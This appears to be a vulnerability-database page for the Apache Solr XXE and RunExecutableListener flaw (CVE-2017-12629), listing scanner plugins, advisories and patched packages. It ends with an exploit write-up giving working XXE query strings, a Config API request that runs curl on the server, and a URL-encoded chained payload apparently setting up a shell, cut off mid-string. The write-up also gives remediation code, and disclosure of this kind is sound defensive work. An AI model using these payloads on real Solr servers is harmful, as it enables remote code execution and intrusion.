source	https://www.tenable.com/plugins/nessus/105522
title	RHEL 6 / 7 : eap7-jboss-ec2-eap (RHSA-2018:0005)

NASL family	Debian Local Security Checks
NASL id	DEBIAN_DLA-1254.NASL
description	Michael Stepankin and Olga Barinova discovered a remote code execution vulnerability in Apache Solr by exploiting XML External Entity processing (XXE) in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. To resolve this issue the RunExecutableListener class has been removed and resolving of external entities in the CoreParser class disallowed. For Debian 7
last seen	2020-03-17
modified	2018-01-22
plugin id	106210
published	2018-01-22
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/106210
title	Debian DLA-1254-1 : lucene-solr security update

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2017-195E7EA9A8.NASL
description	Security fix for CVE-2017-12629 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2018-01-15
plugin id	105826
published	2018-01-15
reporter	This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/105826
title	Fedora 27 : lucene4 (2017-195e7ea9a8)

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2018-0002.NASL
description	An update is now available for Red Hat JBoss Enterprise Application Platform 7.0 for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Red Hat JBoss Enterprise Application Platform is a platform for Java applications based on the JBoss Application Server. This release of Red Hat JBoss Enterprise Application Platform 7.0.9 serves as a replacement for Red Hat JBoss Enterprise Application Platform 7.0.8, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es) : * It was found that Apache Lucene would accept an object from an unauthenticated user that could be manipulated through subsequent post requests. An attacker could use this flaw to assemble an object that could permit execution of arbitrary code if the server enabled Apache Solr
last seen	2020-06-01
modified	2020-06-02
plugin id	105559
published	2018-01-04
reporter	This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/105559
title	RHEL 6 : JBoss EAP (RHSA-2018:0002)

NASL family	Ubuntu Local Security Checks
NASL id	UBUNTU_USN-4259-1.NASL
description	Michael Stepankin and Olga Barinova discovered that Apache Solr was vulnerable to an XXE attack. An attacker could use this vulnerability to remotely execute code. Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-01
modified	2020-06-02
plugin id	133355
published	2020-01-30
reporter	Ubuntu Security Notice (C) 2020 Canonical, Inc. / NASL script (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/133355
title	Ubuntu 16.04 LTS : Apache Solr vulnerability (USN-4259-1)

Packetstorm

data source	https://packetstormsecurity.com/files/download/144678/apachesolr701-xxe.txt
id	PACKETSTORM:144678
last seen	2017-10-21
published	2017-10-18
reporter	Michael Stepankin
source	https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html
title	Apache Solr 7.0.1 XXE Injection / Code Execution

Redhat

advisories

rhsa
id RHSA-2017:3123
rhsa
id RHSA-2017:3124
rhsa
id RHSA-2017:3244
rhsa
id RHSA-2017:3451
rhsa
id RHSA-2017:3452
rhsa
id RHSA-2018:0002
rhsa
id RHSA-2018:0003
rhsa
id RHSA-2018:0004
rhsa
id RHSA-2018:0005

rpms

eap7-lucene-analyzers-common-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-analyzers-common-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-backward-codecs-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-backward-codecs-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-core-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-core-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-facet-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-facet-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-misc-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-misc-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-queries-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-queries-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-queryparser-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-queryparser-0:5.3.1-4.redhat_2.1.ep7.el7
eap7-lucene-solr-0:5.3.1-4.redhat_2.1.ep7.el6
eap7-lucene-solr-0:5.3.1-4.redhat_2.1.ep7.el7
rh-java-common-lucene-0:4.8.0-6.9.el6
rh-java-common-lucene-0:4.8.0-6.9.el7
rh-java-common-lucene-analysis-0:4.8.0-6.9.el6
rh-java-common-lucene-analysis-0:4.8.0-6.9.el7
rh-java-common-lucene-analyzers-phonetic-0:4.8.0-6.9.el6
rh-java-common-lucene-analyzers-phonetic-0:4.8.0-6.9.el7
rh-java-common-lucene-analyzers-smartcn-0:4.8.0-6.9.el6
rh-java-common-lucene-analyzers-smartcn-0:4.8.0-6.9.el7
rh-java-common-lucene-analyzers-stempel-0:4.8.0-6.9.el6
rh-java-common-lucene-analyzers-stempel-0:4.8.0-6.9.el7
rh-java-common-lucene-classification-0:4.8.0-6.9.el6
rh-java-common-lucene-classification-0:4.8.0-6.9.el7
rh-java-common-lucene-codecs-0:4.8.0-6.9.el6
rh-java-common-lucene-codecs-0:4.8.0-6.9.el7
rh-java-common-lucene-facet-0:4.8.0-6.9.el6
rh-java-common-lucene-facet-0:4.8.0-6.9.el7
rh-java-common-lucene-grouping-0:4.8.0-6.9.el6
rh-java-common-lucene-grouping-0:4.8.0-6.9.el7
rh-java-common-lucene-highlighter-0:4.8.0-6.9.el6
rh-java-common-lucene-highlighter-0:4.8.0-6.9.el7
rh-java-common-lucene-javadoc-0:4.8.0-6.9.el6
rh-java-common-lucene-javadoc-0:4.8.0-6.9.el7
rh-java-common-lucene-join-0:4.8.0-6.9.el6
rh-java-common-lucene-join-0:4.8.0-6.9.el7
rh-java-common-lucene-memory-0:4.8.0-6.9.el6
rh-java-common-lucene-memory-0:4.8.0-6.9.el7
rh-java-common-lucene-misc-0:4.8.0-6.9.el6
rh-java-common-lucene-misc-0:4.8.0-6.9.el7
rh-java-common-lucene-parent-0:4.8.0-6.9.el6
rh-java-common-lucene-parent-0:4.8.0-6.9.el7
rh-java-common-lucene-queries-0:4.8.0-6.9.el6
rh-java-common-lucene-queries-0:4.8.0-6.9.el7
rh-java-common-lucene-queryparser-0:4.8.0-6.9.el6
rh-java-common-lucene-queryparser-0:4.8.0-6.9.el7
rh-java-common-lucene-replicator-0:4.8.0-6.9.el6
rh-java-common-lucene-replicator-0:4.8.0-6.9.el7
rh-java-common-lucene-sandbox-0:4.8.0-6.9.el6
rh-java-common-lucene-sandbox-0:4.8.0-6.9.el7
rh-java-common-lucene-solr-grandparent-0:4.8.0-6.9.el6
rh-java-common-lucene-solr-grandparent-0:4.8.0-6.9.el7
rh-java-common-lucene-suggest-0:4.8.0-6.9.el6
rh-java-common-lucene-suggest-0:4.8.0-6.9.el7
rh-java-common-lucene5-0:5.4.1-2.4.el6
rh-java-common-lucene5-0:5.4.1-2.4.el7
rh-java-common-lucene5-analysis-0:5.4.1-2.4.el6
rh-java-common-lucene5-analysis-0:5.4.1-2.4.el7
rh-java-common-lucene5-analyzers-smartcn-0:5.4.1-2.4.el6
rh-java-common-lucene5-analyzers-smartcn-0:5.4.1-2.4.el7
rh-java-common-lucene5-backward-codecs-0:5.4.1-2.4.el6
rh-java-common-lucene5-backward-codecs-0:5.4.1-2.4.el7
rh-java-common-lucene5-classification-0:5.4.1-2.4.el6
rh-java-common-lucene5-classification-0:5.4.1-2.4.el7
rh-java-common-lucene5-codecs-0:5.4.1-2.4.el6
rh-java-common-lucene5-codecs-0:5.4.1-2.4.el7
rh-java-common-lucene5-facet-0:5.4.1-2.4.el6
rh-java-common-lucene5-facet-0:5.4.1-2.4.el7
rh-java-common-lucene5-grouping-0:5.4.1-2.4.el6
rh-java-common-lucene5-grouping-0:5.4.1-2.4.el7
rh-java-common-lucene5-highlighter-0:5.4.1-2.4.el6
rh-java-common-lucene5-highlighter-0:5.4.1-2.4.el7
rh-java-common-lucene5-javadoc-0:5.4.1-2.4.el6
rh-java-common-lucene5-javadoc-0:5.4.1-2.4.el7
rh-java-common-lucene5-join-0:5.4.1-2.4.el6
rh-java-common-lucene5-join-0:5.4.1-2.4.el7
rh-java-common-lucene5-memory-0:5.4.1-2.4.el6
rh-java-common-lucene5-memory-0:5.4.1-2.4.el7
rh-java-common-lucene5-misc-0:5.4.1-2.4.el6
rh-java-common-lucene5-misc-0:5.4.1-2.4.el7
rh-java-common-lucene5-parent-0:5.4.1-2.4.el6
rh-java-common-lucene5-parent-0:5.4.1-2.4.el7
rh-java-common-lucene5-queries-0:5.4.1-2.4.el6
rh-java-common-lucene5-queries-0:5.4.1-2.4.el7
rh-java-common-lucene5-queryparser-0:5.4.1-2.4.el6
rh-java-common-lucene5-queryparser-0:5.4.1-2.4.el7
rh-java-common-lucene5-replicator-0:5.4.1-2.4.el6
rh-java-common-lucene5-replicator-0:5.4.1-2.4.el7
rh-java-common-lucene5-sandbox-0:5.4.1-2.4.el6
rh-java-common-lucene5-sandbox-0:5.4.1-2.4.el7
rh-java-common-lucene5-solr-grandparent-0:5.4.1-2.4.el6
rh-java-common-lucene5-solr-grandparent-0:5.4.1-2.4.el7
rh-java-common-lucene5-suggest-0:5.4.1-2.4.el6
rh-java-common-lucene5-suggest-0:5.4.1-2.4.el7
eap7-activemq-artemis-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-cli-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-commons-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-core-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-dto-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-hornetq-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-hqclient-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-jms-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-jms-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-journal-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-native-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-ra-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-selector-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-activemq-artemis-service-extensions-0:1.1.0-19.SP24_redhat_1.1.ep7.el6
eap7-hibernate-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-hibernate-core-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-hibernate-entitymanager-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-hibernate-envers-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-hibernate-infinispan-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-hibernate-java8-0:5.0.16-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-common-api-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-common-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-common-spi-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-core-api-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-core-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-deployers-common-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-jdbc-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-ironjacamar-validator-0:1.3.8-1.Final_redhat_1.1.ep7.el6
eap7-jboss-remoting-0:4.0.25-1.Final_redhat_1.1.ep7.el6
eap7-jboss-xnio-base-0:3.4.7-1.Final_redhat_1.1.ep7.el6
eap7-jgroups-0:3.6.12-1.Final_redhat_1.1.ep7.el6
eap7-resteasy-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-async-http-servlet-3.0-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-atom-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-cdi-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-client-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-crypto-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jackson-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jackson2-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jaxb-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jaxrs-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jettison-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jose-jwt-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-jsapi-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-json-p-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-multipart-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-spring-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-validator-provider-11-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-resteasy-yaml-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el6
eap7-undertow-0:1.3.31-3.Final_redhat_3.1.ep7.el6
eap7-wildfly-0:7.0.9-4.GA_redhat_3.1.ep7.el6
eap7-wildfly-javadocs-0:7.0.9-2.GA_redhat_3.1.ep7.el6
eap7-wildfly-modules-0:7.0.9-4.GA_redhat_3.1.ep7.el6
eap7-activemq-artemis-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-cli-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-commons-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-core-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-dto-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-hornetq-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-hqclient-protocol-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-jms-client-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-jms-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-journal-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-native-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-ra-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-selector-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-server-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-activemq-artemis-service-extensions-0:1.1.0-19.SP24_redhat_1.1.ep7.el7
eap7-hibernate-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-hibernate-core-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-hibernate-entitymanager-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-hibernate-envers-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-hibernate-infinispan-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-hibernate-java8-0:5.0.16-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-common-api-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-common-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-common-spi-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-core-api-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-core-impl-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-deployers-common-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-jdbc-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-ironjacamar-validator-0:1.3.8-1.Final_redhat_1.1.ep7.el7
eap7-jboss-remoting-0:4.0.25-1.Final_redhat_1.1.ep7.el7
eap7-jboss-xnio-base-0:3.4.7-1.Final_redhat_1.1.ep7.el7
eap7-jgroups-0:3.6.12-1.Final_redhat_1.1.ep7.el7
eap7-resteasy-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-async-http-servlet-3.0-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-atom-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-cdi-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-client-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-crypto-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jackson-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jackson2-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jaxb-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jaxrs-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jettison-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jose-jwt-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-jsapi-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-json-p-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-multipart-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-spring-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-validator-provider-11-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-resteasy-yaml-provider-0:3.0.19-7.SP5_redhat_1.1.ep7.el7
eap7-undertow-0:1.3.31-3.Final_redhat_3.1.ep7.el7
eap7-wildfly-0:7.0.9-4.GA_redhat_3.1.ep7.el7
eap7-wildfly-javadocs-0:7.0.9-2.GA_redhat_3.1.ep7.el7
eap7-wildfly-modules-0:7.0.9-4.GA_redhat_3.1.ep7.el7
eap7-jboss-ec2-eap-0:7.0.9-2.GA_redhat_2.ep7.el6
eap7-jboss-ec2-eap-0:7.0.9-2.GA_redhat_2.ep7.el7
eap7-jboss-ec2-eap-samples-0:7.0.9-2.GA_redhat_2.ep7.el6
eap7-jboss-ec2-eap-samples-0:7.0.9-2.GA_redhat_2.ep7.el7

Seebug

bulletinFamily	exploit
description	### First Vulnerability: XML External Entity Expansion (deftype=xmlparser) Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports "xml" query parser in the search query. The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://): ``` Example usage: http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/xxx"'><a></a>'} ``` When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition. Considering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions. For example, this vulnerability could be user to send malicious data to the '/upload' handler: ``` http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://xxx.s.artsploit.com/solr/gettingstarted/upload?stream.body={"xx":"yy"}&commit=true"'><a></a>'} ``` This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver. Vulnerable code location: `/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java` ``` static Document parseXML(InputStream pXmlFile) throws ParserException { DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder db = null; try { db = dbf.newDocumentBuilder(); } catch (Exception se) { throw new ParserException("XML Parser configuration error", se); } org.w3c.dom.Document doc = null; try { doc = db.parse(pXmlFile); } ``` #### Steps to reproduce: 1. Set up a listener on any port by using netcat command "`nc -lv 4444`" 2. Open `http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:4444/executed"><a></a>'}` 3. You will see a request from the Solr server on your netcat listener. It proves that the DOCTYPE declaration is resolved. #### Remediation suggestions: Consider adding the following lines to `/solr/src/lucene/queryparser/src/java/org/apache/lucene/queryparser/xml/CoreParser.java`: ``` static Document parseXML(InputStream pXmlFile) throws ParserException { DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance(); DocumentBuilder db = null; try { //protect from XXE attacks dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); dbf.setFeature("http://xml.org/sax/features/external-general-entities", false); dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false); db = dbf.newDocumentBuilder(); } catch (Exception se) { throw new ParserException("XML Parser configuration error", se); } org.w3c.dom.Document doc = null; try { doc = db.parse(pXmlFile); } ``` #### Links: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet #### CVSS v2 base score: 9.0 (AV:N/AC:L/Au:N/C:C/I:P/A:P) ### Second Vulnerability: Remote Code Execution (add-listener: RunExecutableListener) Solr "RunExecutableListener" class can be used to execute arbitrary commands on specific events, for example after each update query. The problem is that such listener can be enabled with any parameters just by using Config API with add-listener command. ``` POST /solr/newcollection/config HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 198 { "add-listener" : { "event":"postCommit", "name":"newlistener", "class":"solr.RunExecutableListener", "exe":"ANYCOMMAND", "dir":"/usr/bin/", "args":["ANYARGS"] } } ``` Parameters "exe", "args" and "dir" can be crafted throught the HTTP request during modification of the collection's config. This means that anybody who can send a HTTP request to Solr API is able to execute arbitrary shell commands when "postCommit" event is fired. It leads to execution of arbitrary remote code for a remote attacker. #### Steps to reproduce: Step 1. Create a new collection: http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2 Step 2. Set up a listener on any port by using netcat command "nc -lv 4444" Step 3. Add a new RunExecutableListener listener for the collection where "exe" attribute contents the name of running command ("/usr/bin/curl") and "args" attribute contents "http://localhost:4444/executed" value to make a request to the attacker's netcat listener: ``` POST /solr/newcollection/config HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 198 { "add-listener" : { "event":"postCommit", "name":"newlistener", "class":"solr.RunExecutableListener", "exe":"curl", "dir":"/usr/bin/", "args":["http://localhost:4444/executed"] } } ``` Step 4. Update "newcollection" to trigger execution of RunExecutableListener: ``` POST /solr/newcollection/update HTTP/1.1 Host: localhost:8983 Connection: close Content-Type: application/json Content-Length: 19 [{"id":"test"}] ``` Step 5. You will see a request from the Solr server on your netcat listener. It proves that the curl command is executed on the server. #### CVSS v2 base score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) ### Summary: By chaining these two vulnerabilities, an external attacker can achieve remote code execution even without direct access to the Solr server. The only requirement is that the attacker should be able to specify a part of query that comes to "q" search parameter (which is a case for many web applications who use solr). Lets say that we have an attacker who can only send search queries ("q" param) to a "/select" solr endpoint. Here is the complete exploit scenario: Step 1. Create New collection via XXE. This step may be skipped if the attacker already knows any collection name. ``` http://localhost:8983/solr/gettingstarted/select?q=%20%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%61%64%6d%69%6e%2f%63%6f%6c%6c%65%63%74%69%6f%6e%73%3f%61%63%74%69%6f%6e%3d%43%52%45%41%54%45%26%6e%61%6d%65%3d%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%26%6e%75%6d%53%68%61%72%64%73%3d%32%22%3e%3c%61%3e%3c%2f%61%3e%27%7d%20 ``` Without URL encode: ``` http://localhost:8983/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://localhost:8983/solr/admin/collections?action=CREATE&name=newcollection&numShards=2"><a></a>'} ``` Step 2. Set up a netcat listener "nc -lv 4444" Step 3. Add a new RunExecutableListener listener via XXE ``` http://localhost:8983/solr/newcollection/select?q=%7b%21%78%6d%6c%70%61%72%73%65%72%20%76%3d%27%3c%21%44%4f%43%54%59%50%45%20%61%20%53%59%53%54%45%4d%20%22%68%74%74%70%3a%2f%2f%6c%6f%63%61%6c%68%6f%73%74%3a%38%39%38%33%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%73%65%6c%65%63%74%3f%71%3d%78%78%78%26%71%74%3d%2f%73%6f%6c%72%2f%6e%65%77%63%6f%6c%6c%65%63%74%69%6f%6e%2f%63%6f%6e%66%69%67%3f%73%74%72%65%61%6d%2e%62%6f%64%79%3d%25%32%35%37%62%25%32%35%32%32%25%32%35%36%31%25%32%35%36%34%25%32%35%36%34%25%32%35%32%64%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%37%62%25%32%35%32%32%25%32%35%36%35%25%32%35%37%36%25%32%35%36%35%25%32%35%36%65%25%32%35%37%34%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%30%25%32%35%36%66%25%32%35%37%33%25%32%35%37%34%25%32%35%34%33%25%32%35%36%66%25%32%35%36%64%25%32%35%36%64%25%32%35%36%39%25%32%35%37%34%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%65%25%32%35%36%31%25%32%35%36%64%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%36%65%25%32%35%36%35%25%32%35%37%37%25%32%35%36%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%33%25%32%35%36%63%25%32%35%36%31%25%32%35%37%33%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%66%25%32%35%36%63%25%32%35%37%32%25%32%35%32%65%25%32%35%35%32%25%32%35%37%35%25%32%35%36%65%25%32%35%34%35%25%32%35%37%38%25%32%35%36%35%25%32%35%36%33%25%32%35%37%35%25%32%35%37%34%25%32%35%36%31%25%32%35%36%32%25%32%35%36%63%25%32%35%36%35%25%32%35%34%63%25%32%35%36%39%25%32%35%37%33%25%32%35%37%34%25%32%35%36%35%25%32%35%36%65%25%32%35%36%35%25%32%35%37%32%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%37%38%25%32%35%36%35%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%34%25%32%35%36%39%25%32%35%37%32%25%32%35%32%32%25%32%35%33%61%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%31%25%32%35%37%32%25%32%35%36%37%25%32%35%37%33%25%32%35%32%32%25%32%35%33%61%25%32%35%35%62%25%32%35%32%32%25%32%35%32%64%25%32%35%36%33%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%34%25%32%35%34%30%25%32%35%37%63%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%65%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%36%35%25%32%35%36%33%25%32%35%36%38%25%32%35%36%66%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%32%25%32%35%36%39%25%32%35%36%65%25%32%35%32%66%25%32%35%36%32%25%32%35%36%31%25%32%35%37%33%25%32%35%36%38%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%64%25%32%35%36%39%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%33%65%25%32%35%32%36%25%32%35%32%32%25%32%35%32%63%25%32%35%32%32%25%32%35%32%66%25%32%35%36%34%25%32%35%36%35%25%32%35%37%